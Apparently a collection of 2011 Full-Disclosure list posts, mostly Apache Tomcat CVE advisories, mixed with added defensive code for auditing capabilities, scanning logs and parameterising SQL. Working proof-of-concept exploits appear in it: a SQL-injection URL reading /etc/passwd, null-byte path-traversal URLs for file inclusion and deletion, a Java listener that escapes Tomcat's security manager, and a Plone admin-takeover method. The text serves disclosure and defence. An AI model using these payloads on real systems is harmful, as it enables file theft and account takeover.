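        self.secret = secret or os.urandom(32)  # random per process, never a fixed string
        self.nonce_ttl = nonce_ttl
        self.highest_nc = {}                    # nonce -> highest nonce count accepted

    def new_nonce(self, now=None):
        """nonce = <issue time>:<HMAC(secret, issue time)>; verifiable without state."""
        ts = str(int(time.time() if now is None else now))
        return ts + ':' + hmac.new(self.secret, ts.encode(), 'sha256').hexdigest()

    def _nonce_fresh(self, nonce, now):
        ts, _, mac = nonce.partition(':')
        if not ts.isdigit():
            return False
        expected = hmac.new(self.secret, ts.encode(), 'sha256').hexdigest()
        return hmac.compare_digest(mac, expected) and now - int(ts) <= self.nonce_ttl

    def verify(self, p, method, now=None):
        """True only if every check passes; callers get no hint about which one failed."""
        now = time.time() if now is None else now
        required = ('username', 'realm', 'nonce', 'uri', 'qop', 'nc', 'cnonce', 'response')
        if any(k not in p for k in required):
            return False
        if p['realm'] != self.realm:                    # realm must be ours
            return False
        if p['qop'] != 'auth':                          # qop must be one we offered
            return False
        if not self._nonce_fresh(p['nonce'], now):      # nonce must be ours and unexpired
            return False
        try:
            nc = int(p['nc'], 16)
        except ValueError:
            return False
        if nc <= self.highest_nc.get(p['nonce'], 0):    # nonce count must increase: no replay
            return False
        password = self.users.get(p['username'])
        if password is None:
            return False
        expected = client_response(p['username'], password, self.realm, method,
                                   p['uri'], p['nonce'], p['nc'], p['cnonce'], p['qop'])
        if not hmac.compare_digest(expected, p['response']):
            return False
        self.highest_nc[p['nonce']] = nc
        return True
```

Without the nonce-count and nonce-freshness checks, anyone who captures one valid header can resend it indefinitely; without the realm check, a response computed for another realm that happens to share a password store is accepted; and a hard-coded server secret lets an attacker mint nonces the server will trust. That combination is why the advisory rates the weak implementation as no better than BASIC.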


Re: [Full-disclosure] Is This MITM Attack to Gmail's SSL ?

2011-08-30 Thread Mark Felder
On Mon, 29 Aug 2011 17:38:14 -0500, Ferenc Kovacs tyr...@gmail.com wrote:

 http://www.google.co.uk/support/forum/p/gmail/thread?tid=2da6158b094b225a&hl=en

 any thoughts?


Just saw this posted. Not sure of authenticity.

http://pastebin.com/ff7Yg663

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure

2011-08-29 Thread Mark Thomas
CVE-2011-3190 Apache Tomcat Authentication bypass and information disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.20
- Tomcat 6.0.0 to 6.0.33
- Tomcat 5.5.0 to 5.5.33
- Earlier, unsupported versions may also be affected

Description:
Apache Tomcat supports the AJP protocol which is used with reverse
proxies to pass requests and associated data about the request from the
reverse proxy to Tomcat. The AJP protocol is designed so that when a
request includes a request body, an unsolicited AJP message is sent to
Tomcat that includes the first part (or possibly all) of the request
body. In certain circumstances, Tomcat did not process this message as a
request body but as a new request. This permitted an attacker to have
full control over the AJP message which allowed an attacker to (amongst
other things):
- insert the name of an authenticated user
- insert any client IP address (potentially bypassing any client IP
address filtering)
- trigger the mixing of responses between users

The following AJP connector implementations are not affected:
org.apache.jk.server.JkCoyoteHandler (5.5.x - default, 6.0.x - default)

The following AJP connector implementations are affected:

org.apache.coyote.ajp.AjpProtocol (6.0.x, 7.0.x - default)
org.apache.coyote.ajp.AjpNioProtocol (7.0.x)
org.apache.coyote.ajp.AjpAprProtocol (5.5.x, 6.0.x, 7.0.x)

Further, this issue only applies if all of the following are true
for at least one resource:
- POST requests are accepted
- The request body is not processed


Example: See https://issues.apache.org/bugzilla/show_bug.cgi?id=51698

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a version of Apache Tomcat that includes a fix for this
issue when available
- Apply the appropriate patch
  - 7.0.x http://svn.apache.org/viewvc?rev=1162958&view=rev
  - 6.0.x http://svn.apache.org/viewvc?rev=1162959&view=rev
  - 5.5.x http://svn.apache.org/viewvc?rev=1162960&view=rev
- Configure the reverse proxy and Tomcat's AJP connector(s) to use the
requiredSecret attribute
- Use the org.apache.jk.server.JkCoyoteHandler AJP connector (not
available for Tomcat 7.0.x)

Credit:
The issue was reported via Apache Tomcat's public issue tracker.
The Apache Tomcat security team strongly discourages reporting of
undisclosed vulnerabilities via public channels. All Apache Tomcat
security vulnerabilities should be reported to the private security team
mailing list: secur...@tomcat.apache.org

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
https://issues.apache.org/bugzilla/show_bug.cgi?id=51698

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Apache Killer

2011-08-24 Thread Mark J Cox
On Fri, Aug 19, 2011 at 11:23 PM, HI-TECH . 
isowarez.isowarez.isowa...@googlemail.com wrote:

 (see attachment)


Use CVE-2011-3192.

Mark
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] CVE-2011-2729: Commons Daemon fails to drop capabilities (Apache Tomcat)

2011-08-12 Thread Mark Thomas
CVE-2011-2729: Commons Daemon fails to drop capabilities (Apache Tomcat)

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Tomcat 7.0.0 to 7.0.19
Tomcat 6.0.30 to 6.0.32
Tomcat 5.5.32 to 5.5.33

Description:
Due to a bug in the capabilities code, jsvc (the service wrapper for
Linux that is part of the Commons Daemon project) does not drop
capabilities allowing the application to access files and directories
owned by superuser. This vulnerability only applies if:
a) Tomcat is running on a Linux operating system
b) jsvc was compiled with libcap
c) -user parameter is used
The Tomcat versions above shipped with source files for jsvc that
included this vulnerability.

Mitigation:
Affected users of all versions can mitigate these vulnerabilities by
taking any of the following actions:
a) upgrade to jsvc 1.0.7 or later
b) do not use -user parameter to switch user
c) recompile the jsvc without libcap support
Updated jsvc source is included in Apache Tomcat 7.0.20 and will be
included in the next releases of Tomcat 6.0.x and 5.5.x. Updated source
can be obtained from the Apache Commons Daemon project.

Credit:
This issue was identified by Wilfried Weissmann.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
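Added example, not part of the advisory: a check that reads /proc/<pid>/status and reports which effective capabilities a process still holds after switching to a non-root uid. A wrapper that dropped capabilities correctly shows at most the ones it meant to keep; the allow-list here (CAP_NET_BIND_SERVICE, for a listener on a port below 1024) is an assumption about the deployment, as are the two constructed status files used to exercise it. The capability bit numbers are those of the Linux uapi header.

```python
"""Audit effective capabilities of a de-privileged process via /proc (added example)."""

CAP_NAMES = [  # index == capability bit number, from linux/capability.h
    'CAP_CHOWN', 'CAP_DAC_OVERRIDE', 'CAP_DAC_READ_SEARCH', 'CAP_FOWNER',
    'CAP_FSETID', 'CAP_KILL', 'CAP_SETGID', 'CAP_SETUID', 'CAP_SETPCAP',
    'CAP_LINUX_IMMUTABLE', 'CAP_NET_BIND_SERVICE', 'CAP_NET_BROADCAST',
    'CAP_NET_ADMIN', 'CAP_NET_RAW', 'CAP_IPC_LOCK', 'CAP_IPC_OWNER',
    'CAP_SYS_MODULE', 'CAP_SYS_RAWIO', 'CAP_SYS_CHROOT', 'CAP_SYS_PTRACE',
    'CAP_SYS_PACCT', 'CAP_SYS_ADMIN', 'CAP_SYS_BOOT', 'CAP_SYS_NICE',
    'CAP_SYS_RESOURCE', 'CAP_SYS_TIME', 'CAP_SYS_TTY_CONFIG', 'CAP_MKNOD',
    'CAP_LEASE', 'CAP_AUDIT_WRITE', 'CAP_AUDIT_CONTROL', 'CAP_SETFCAP',
    'CAP_MAC_OVERRIDE', 'CAP_MAC_ADMIN', 'CAP_SYSLOG', 'CAP_WAKE_ALARM',
    'CAP_BLOCK_SUSPEND', 'CAP_AUDIT_READ',
]
# Assumption for this example: the only capability a port-80 service wrapper should keep.
ALLOWED_AFTER_DROP = {'CAP_NET_BIND_SERVICE'}


def decode_caps(hexmask):
    """Turn the CapEff hex mask into capability names."""
    mask = int(hexmask, 16)
    names = [n for i, n in enumerate(CAP_NAMES) if mask >> i & 1]
    extra = mask >> len(CAP_NAMES)          # bits newer than this table
    if extra:
        names.append(f'+{bin(extra).count("1")} newer caps')
    return names


def parse_status(text):
    fields = {}
    for line in text.splitlines():
        if ':' in line:
            key, value = line.split(':', 1)
            fields[key.strip()] = value.strip()
    return fields


def audit_status(text):
    """Flag a process whose effective uid is not root but which still holds
    capabilities outside the allow-list, i.e. the failure mode in the advisory."""
    f = parse_status(text)
    euid = int(f['Uid'].split()[1])         # Uid: real effective saved fs
    caps = decode_caps(f.get('CapEff', '0'))
    unexpected = [c for c in caps if c not in ALLOWED_AFTER_DROP]
    return {'name': f.get('Name'), 'euid': euid, 'caps': caps,
            'unexpected': unexpected, 'suspicious': euid != 0 and bool(unexpected)}


def audit_pid(pid):
    with open(f'/proc/{pid}/status') as fh:
        return audit_status(fh.read())


# Constructed status excerpts (not captured from a real host):
# a wrapper that switched to uid 1001 but kept every capability,
BUGGY = "Name:\tjsvc\nUid:\t1001\t1001\t1001\t1001\nCapEff:\t0000003fffffffff\n"
# and one that kept only CAP_NET_BIND_SERVICE (bit 10).
FIXED = "Name:\tjsvc\nUid:\t1001\t1001\t1001\t1001\nCapEff:\t0000000000000400\n"

if __name__ == '__main__':
    import sys
    for pid in sys.argv[1:]:
        print(pid, audit_pid(pid))
```

Run it against the pid of the running service after startup; CAP_DAC_OVERRIDE or CAP_DAC_READ_SEARCH on a non-root uid is the concrete symptom behind "access files and directories owned by superuser".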


[Full-disclosure] [SECURITY] CVE-2011-2481: Apache Tomcat information disclosure vulnerability

2011-08-12 Thread Mark Thomas
CVE-2011-2481: Apache Tomcat information disclosure vulnerability

Severity: low

Vendor:
The Apache Software Foundation

Versions Affected:
Tomcat 7.0.0 to 7.0.16
Previous versions are not affected.

Description:
The re-factoring of XML validation for Tomcat 7.0.x re-introduced the
vulnerability previously reported as CVE-2009-0783. This was initially
reported as a memory leak
(https://issues.apache.org/bugzilla/show_bug.cgi?id=51395). If a web
application is the first web application loaded, this bug allows that
web application to potentially view and/or alter the web.xml, context.xml
and tld files of other web applications deployed on the Tomcat instance.

Mitigation:
7.0.x users should upgrade to 7.0.17 or later

Example:
See https://issues.apache.org/bugzilla/show_bug.cgi?id=29936#c12 for an
example web application that can be used to replace the XML parser used
by Tomcat.

Credit:
The security implications of bug 51395 were identified by the Tomcat
security team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html

The Apache Tomcat Security Team

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] CVE-2011-2204 - Apache Tomcat information disclosure

2011-06-27 Thread Mark Thomas
CVE-2011-2204 Apache Tomcat information disclosure

Severity: Low
Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.16
- Tomcat 6.0.0 to 6.0.32
- Tomcat 5.5.0 to 5.5.33
Earlier, unsupported versions may also be affected

Description:
When using the MemoryUserDatabase (based on tomcat-users.xml) and
creating users via JMX, an exception during the user creation process
may trigger an error message in the JMX client that includes the user's
password. This error message is also written to the Tomcat logs. User
passwords are visible to administrators with JMX access and/or
administrators with read access to the tomcat-users.xml file. Users that
do not have these permissions but are able to read log files may be able
to discover a user's password.

Steps to reproduce:
The Tomcat security team has been unable to reproduce this error without
forcing an exception by modifying the Tomcat source code. In theory, an
OutOfMemoryError at exactly the right point could trigger this
vulnerability.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Don't manage the MemoryUserDatabase via JMX
- Use digested passwords
- Limit access to Tomcat log files
- Upgrade to a Tomcat 7.0.17, 6.0.33 or 5.5.34 or later once released
- Apply the appropriate patch
  - 7.0.x: http://svn.apache.org/viewvc?rev=1140070&view=rev
  - 6.0.x: http://svn.apache.org/viewvc?rev=1140071&view=rev
  - 5.5.x: http://svn.apache.org/viewvc?rev=1140072&view=rev

Credit:
This issue was identified by Polina Genova and reported privately to the
Tomcat Security Team via secur...@tomcat.apache.org.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Got an iPhone or 3G iPad? Apple is recording your moves

2011-04-22 Thread mark seiden
not to mention that ocr-able license plate on your vehicle and the electronic 
toll collection device
in the vehicle make excellent persistent tracking cookies.

i'm more worried about private parties tracking these days...  say set up high 
res cameras with a good view 
of the major highways and scan all of the license plates.


On Apr 22, 2011, at 6:43 AM, Brian Anderson wrote:

 On 4/21/2011 5:56 PM, Michal Zalewski wrote:
 Cool. I got an Iphone 3GS. Consider me ex-user. GG Apple. Let me guess,
 co-operation deal with NSA and the U.S goverment paid them some billion
 dollars for that.
 Totally. A vast conspiracy is the only possible explanation.
 
 
 If you didn't already know that you are being tracked by carrying a cell
 phone, then you're not paranoid enough to work in security. ;)
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Plone CVE-2011-0720 details

2011-04-18 Thread Mark Jenkins
This is in regards to CVE-2011-0720, a Plone vulnerability announced in 
early February.
http://plone.org/products/plone/security/advisories/cve-2011-0720

As noted on
http://www.securityfocus.com/bid/46102/exploit
An attacker can exploit this issue using a browser.

To fill in a few more details:

Plone is implemented with Zope -- an object oriented system web 
application framework. Many Zope objects can be referenced by url of a 
file system like hierarchy formed by object names. Methods of such 
objects are thus addressable as 
/path_to_parent_object/path_to_object/name_of_method . Arguments as 
listed in these function definitions correspond to field names as per 
standard URL encoding (http://en.wikipedia.org/wiki/Percent-encoding).

Object paths consist of object names and are not necessarily related by 
type. To search by object type, use the find feature in the Zope 
Management Interface.

I studied the released hotfix and documented corresponding patches in 
the subversion repositories that were slated to go into Plone 4.0.4 . 
(easier than reading the hotfix)
http://dl.dropbox.com/u/16487130/plone_4.0.4_security_patches.txt

Used the Zope Management Interface find feature in my own test 
deployment of Plone 4.0.3 to find objects of the affected types.

Searching for type Pluggable Auth Service (PAS) as patched by
http://dev.plone.org/collective/changeset/232213
was most fruitful. On default Plone installations a PAS can be found in 
/acl_users/ for each installed site.

The exposed getUsers and userSetPassword methods are a fairly dangerous 
combination that can be exploited by anonymous attackers. Other 
functions are of more limited value or require stronger permissions.

These methods are also listed in the log checker
http://plone.org/products/plone-hotfix/releases/CVE-2011-0720/logchecker.py
but with the /acl_users/ part absent.

--- End Details ---


On the matter of disclosure gap and necessary capabilities:

I spent around 16 waking hours and 26 clock hours to go from having seen 
the original vulnerability announcement to exploiting. This is in my 
guess a high upper bound for the capabilities required to go from vuln 
to sploit.

I had only user-level prior familiarity with Plone and no prior 
familiarity with Zope.

To test if someone else could reasonably translate these public 
vulnerability details into an exploit, I presented the basic knowledge 
of Zope URL based invocation and how I found /acl_users/, and pointed to 
the above relevant patch over the course of 2 hours at a 
competition/talk on March 19th. Another individual was able to identify 
the appropriate function name and arguments with an additional hour, 
escalated to an administrator account, and vandalized a test site 
running for the occasion.
http://www.skullspace.ca/blog/2011/03/hackathon-4-was-a-huge-success/

I regret that a recording was not made despite best efforts and that my 
slides are of such limited detail to not warrant publication.
(this email has way more useful information)

Though both myself and the other individual have programming 
backgrounds, I guess that a moderately determined individual without 
such capabilities could also close the disclosure gap.

The crucial step of finding /acl_users/ with the find feature in ZMI is 
an interactive, play and use, kind of step. Finding the relevant 
function name is a matter of reading. The direct relationship between 
the method names and argument names with the URLs is spelled out in 
multiple Zope tutorials.

Correct me if I'm wrong, but I believe this post is the first public 
comment to go beyond the patches, hotfix, and logchecker released by the 
Plone foundation.


Mark Jenkins

p.s.

In the end, not quite:
you'll have 30 minutes before the exploit worms start knocking on 
doors, I say.
http://weblion.psu.edu/chatlogs/%23plone/2011/02/02.txt

But probably not
I have doubts if there will be an exploit script ever
http://weblion.psu.edu/chatlogs/%23plone/2011/02/09.txt
anymore...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
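Added example, not the Plone Foundation's logchecker: a scan over web-server access logs for requests that invoke the two PAS methods the post names, getUsers and userSetPassword. It decodes the path first, because URL-based method invocation works just as well with percent-encoded segment names, and reports higher confidence when the hit is under /acl_users/, where the post locates the PAS on a default install. It assumes an Apache-style combined log format in front of Zope; the sample lines are constructed and the addresses are documentation ranges.

```python
"""Flag access-log requests that call exposed PAS methods (added example)."""
import re
from urllib.parse import unquote, urlsplit

SENSITIVE = {'getUsers', 'userSetPassword'}   # the method names given in the post
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<verb>[A-Z]+) (?P<url>\S+)[^"]*" (?P<status>\d{3})')


def check_line(line):
    """Return a finding for one log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = unquote(urlsplit(m['url']).path)   # %75serSetPassword -> userSetPassword
    segs = [s for s in path.split('/') if s]
    called = [s for s in segs if s in SENSITIVE]
    if not called:
        return None
    return {'ip': m['ip'], 'ts': m['ts'], 'verb': m['verb'], 'status': int(m['status']),
            'method': called[-1], 'path': path,
            # a hit outside /acl_users/ may be a different object exposing the same name
            'confidence': 'high' if 'acl_users' in segs else 'low'}


def scan(lines):
    return [r for r in map(check_line, lines) if r]


# Constructed sample log, not from a real deployment.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Feb/2011:10:15:02 +0000] "GET /Plone/acl_users/getUsers HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [03/Feb/2011:10:16:40 +0000] "POST /Plone/acl_users/%75serSetPassword HTTP/1.1" '
    '200 311 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Feb/2011:10:17:00 +0000] "GET /Plone/front-page HTTP/1.1" '
    '200 9001 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [03/Feb/2011:10:18:00 +0000] "GET /Plone/getUsers?x=1 HTTP/1.1" '
    '404 210 "-" "curl/7.21"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 on userSetPassword from an address that never authenticated is the sequence the post describes (enumerate with getUsers, then reset an administrator's password), so treat that pairing from one source as an account takeover rather than a probe. POST bodies are not in the access log, so the request line alone cannot show which user was targeted.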


[Full-disclosure] [SECURITY] CVE-2011-1183 Apache Tomcat security constraint bypass

2011-04-06 Thread Mark Thomas
CVE-2011-1183 Apache Tomcat security constraint bypass

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.11
- Earlier versions are not affected

Description:
A regression in the fix for CVE-2011-1088 meant that security
constraints were ignored when no login configuration was present in the
web.xml and the web application was marked as meta-data complete.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a Tomcat 7.0.12 or later
- Ensure a login configuration is defined in web.xml

Credit:
This issue was identified by the Apache Tomcat security team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] CVE-2011-1475 Apache Tomcat information disclosure

2011-04-06 Thread Mark Thomas
CVE-2011-1475 Apache Tomcat information disclosure

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.11
- Earlier versions are not affected

Description:
Changes introduced to the HTTP BIO connector to support Servlet 3.0
asynchronous requests did not fully account for HTTP pipelining. As a
result, when using HTTP pipelining a range of unexpected behaviours
occurred including the mixing up of responses between requests. While
the mix-up in responses was only observed between requests from the same
user, a mix-up of responses for requests from different users may also
be possible.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a Tomcat 7.0.12 or later
- Switch to the NIO or APR/native HTTP connectors that do not exhibit
this issue

Credit:
This issue was identified by Brad Piles and reported via the public ASF
Bugzilla issue tracking system.
The Apache Tomcat security team requests that security vulnerability
reports are made privately to secur...@tomcat.apache.org in the first
instance.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] 'Andy's PHP Knowledgebase' SQL Injection Vulnerability (CVE-2011-1546)

2011-03-30 Thread Mark Stanislav
'Andy's PHP Knowledgebase' SQL Injection Vulnerability (CVE-2011-1546)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
A vulnerability exists in a_viewusers.php allowing for SQL injection of the 's' 
query parameter.

 
II. TESTED VERSION
---
0.95.2


III. PoC EXPLOIT
---
http://www.example.com/aphpkb/a_viewusers.php?s=1%20UNION%20SELECT%20load_file(0x2f6574632f706173737764),null,null,null,null,null,null%20limit%200


IV. SOLUTION
---
Upgrade to 0.95.3 or above.


V. REFERENCES
---
http://www.aphpkb.org/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1546
http://www.uncompiled.com/2011/03/cve-2011-1546/


VI. TIMELINE
---
03/13/2011 - Initial vendor disclosure
03/16/2011 - Vendor patched and released an updated version
03/16/2011 - Confirmed fix & disclosure date
03/30/2011 - Public disclosure
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
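Added example, not the application's own code: a hypothetical reconstruction of the pattern behind the advisory (the 's' parameter dropped into the SQL text as-is) next to a parameterised version, run against an in-memory SQLite database with constructed rows. The injected value is shaped like the PoC above: an id that matches nothing, then a UNION whose column count equals that of the original SELECT, which is why the PoC pads with six nulls. MySQL's load_file() has no SQLite equivalent, so the injected SELECT reads from a second table instead; on MySQL, load_file() additionally needs the FILE privilege and a readable path.

```python
"""SQL injection via an unvalidated id parameter, vulnerable and fixed (added example)."""
import sqlite3

# Seven columns, matching the six nulls plus one selected value in the PoC URL.
COLUMNS = 'id, username, email, role, created, lastlogin, active'


def setup_db():
    """Constructed schema and rows; nothing here comes from the real application."""
    db = sqlite3.connect(':memory:')
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, email TEXT, role TEXT,
                           created TEXT, lastlogin TEXT, active INTEGER);
        INSERT INTO users VALUES (1, 'admin', 'admin@example.org', 'admin',
                                  '2011-01-01', '2011-03-01', 1);
        CREATE TABLE secrets(contents TEXT);
        INSERT INTO secrets VALUES ('root:x:0:0:root:/root:/bin/bash');
    """)
    return db


def view_users_vulnerable(db, s):
    """Query text built by concatenation: whatever is in s becomes SQL."""
    return db.execute(f"SELECT {COLUMNS} FROM users WHERE id = {s}").fetchall()


def view_users_fixed(db, s):
    """Validate the type, then bind: the value can never alter the statement."""
    if not s.isdigit():
        raise ValueError('id must be a non-negative integer')
    return db.execute(f"SELECT {COLUMNS} FROM users WHERE id = ?", (int(s),)).fetchall()


def fixed_rejects(db, s):
    try:
        view_users_fixed(db, s)
        return False
    except ValueError:
        return True


def union_column_check(db, n_cols):
    """Does a UNION with n_cols columns run against the vulnerable query?
    Shows why the attacker must match the original SELECT's column count."""
    nulls = ', '.join(['null'] * (n_cols - 1))
    try:
        view_users_vulnerable(db, f"0 UNION ALL SELECT contents, {nulls} FROM secrets")
        return True
    except sqlite3.OperationalError:
        return False


# The injected value, shaped like the PoC's 's' parameter.
PAYLOAD = "0 UNION ALL SELECT contents, null, null, null, null, null, null FROM secrets"

if __name__ == '__main__':
    db = setup_db()
    print(view_users_vulnerable(db, PAYLOAD))   # the secrets row comes back as a "user"
    print(fixed_rejects(db, PAYLOAD))           # True: rejected before reaching the database
```

The type check alone is not the fix; the bound parameter is. The isdigit() guard only gives the caller a clean error instead of a database error for non-numeric input.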


[Full-disclosure] [SECURITY] CVE-2011-1088 Apache Tomcat security constraint bypass

2011-03-15 Thread Mark Thomas
CVE-2011-1088 Apache Tomcat security constraint bypass

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.10
- Earlier versions are not affected

Description:
When a web application was started, @ServletSecurity annotations were
ignored. This meant that some areas of the application may not have been
protected as expected.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a Tomcat version where this issue is fixed
- Define security constraints via an alternative mechanism such as web.xml

Credit:
This issue was reported publicly on the Tomcat users mailing list.
The Apache Tomcat security team requests that security vulnerability
reports are made privately to secur...@tomcat.apache.org in the first instance.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html



[Full-disclosure] 'Quick Polls' Local File Inclusion & Deletion Vulnerabilities (CVE-2011-1099)

2011-03-06 Thread Mark Stanislav
'Quick Polls' Local File Inclusion & Deletion Vulnerabilities (CVE-2011-1099)
Mark Stanislav - mark.stanis...@gmail.com


I. DESCRIPTION
---
Two vulnerabilities exist in 'Quick Polls' providing local file inclusion & 
local file deletion due to null-byte attacks against functions in index.php.

 
II. TESTED VERSION
---
1.0.1


III. PoC EXPLOITS
---
LFI: 
http://example.com/quickpolls/?fct=preview&p=../../../../../../../etc/passwd%00
LFD: 
http://example.com/quickpolls/?fct=delete&p=../../../../../../../tmp/foobar%00


IV. NOTES 
---
* magic_quotes_gpc must be disabled for null-byte attacks to work


V. SOLUTION
---
Upgrade to 1.0.2 or above


VI. REFERENCES
---
http://www.focalmedia.net/create_voting_poll.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1099
http://www.uncompiled.com/2011/03/quick-polls-local-file-inclusion-deletion-vulnerabilities-cve-2011-1099/


VII. TIMELINE
---
02/05/2011 - Initial vendor disclosure
02/07/2011 - Vendor patched and released an updated version
02/07/2011 - Confirmed public disclosure date with vendor
03/06/2011 - Public disclosure


[Full-disclosure] [SECURITY] CVE-2010-3718 Apache Tomcat Local bypass of security manager file permissions

2011-02-04 Thread Mark Thomas
CVE-2010-3718 Apache Tomcat Local bypass of security manager file permissions

Severity: Low

Vendor: The Apache Software Foundation

Versions Affected:
- Tomcat 7.0.0 to 7.0.3
- Tomcat 6.0.0 to 6.0.?
- Tomcat 5.5.0 to 5.5.?
- Earlier, unsupported versions may also be affected

Description:
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContext
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
This vulnerability is only applicable when hosting web applications from
untrusted sources such as shared hosting environments.

Example (AL2 licensed):

Listener source
---
package listeners;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;

public final class FooListener implements ServletContextListener {
    public void contextInitialized(ServletContextEvent event) {
        ServletContext context = event.getServletContext();
        // Read the work directory Tomcat assigned to this web application.
        java.io.File workdir = (java.io.File) context
                .getAttribute("javax.servlet.context.tempdir");
        // The attribute should be read-only; on affected versions it is not,
        // so redirect it to conf/ before Tomcat grants file permissions on it.
        if (workdir.toString().indexOf("..") < 0) {
            context.setAttribute("javax.servlet.context.tempdir",
                    new java.io.File(workdir, "../../../../conf"));
        }
    }
    public void contextDestroyed(ServletContextEvent event) {
    }
}

web.xml snippet
---
<listener>
  <listener-class>listeners.FooListener</listener-class>
</listener>


Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a Tomcat version where this issue is fixed
- Undeploy all web applications from untrusted sources

Credit:
The issue was identified by the Tomcat security team.

References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html



[Full-disclosure] [SECURITY] Oracle JVM bug causes denial of service in Apache Tomcat

2011-02-04 Thread Mark Thomas
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

The original report is [1].

Tomcat is affected when accessing a form-based security-constrained
page or any page that calls javax.servlet.ServletRequest.getLocale() or
javax.servlet.ServletRequest.getLocales().

Work-arounds have been implemented in the following versions:
- 7.0.8 (released)
- 6.0.32 (released)
- 5.5.33 (release expected Monday 7 Feb 2011)

All users are recommended to upgrade to a Tomcat version with the
work-around. Users unable to upgrade can filter malicious requests via a
Servlet filter, an httpd re-write rule (if Tomcat is behind an httpd
reverse proxy) or other filtering as available.

Accept-Language headers that are compliant with RFC 2616 cannot trigger
this bug. Therefore, filtering out all requests with non-compliant
headers will provide protection against the DoS vulnerability.

The Apache Tomcat Security Team


[1]
http://www.exploringbinary.com/java-hangs-when-converting-2-2250738585072012e-308/

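
The work-around above rests on one observation: the JVM hang is triggered by a particular decimal string reaching Double.parseDouble, and a qvalue written per RFC 2616 section 14.4 ("0" with up to three decimal digits, or "1" with up to three zeros) can never contain such a string. The check below is an added example, not Tomcat's own Accept-Language parser: it transcribes that grammar as a regular expression and shows a front-end filter decision that could sit in a reverse proxy or a Servlet filter (where it is deployed is an assumption of the deployment, not of the code). Lower-case 'q' is required, as written in the RFC.

```python
import re

# RFC 2616 section 14.4 grammar, transcribed as a regex (added example; this is
# not Tomcat's parser):
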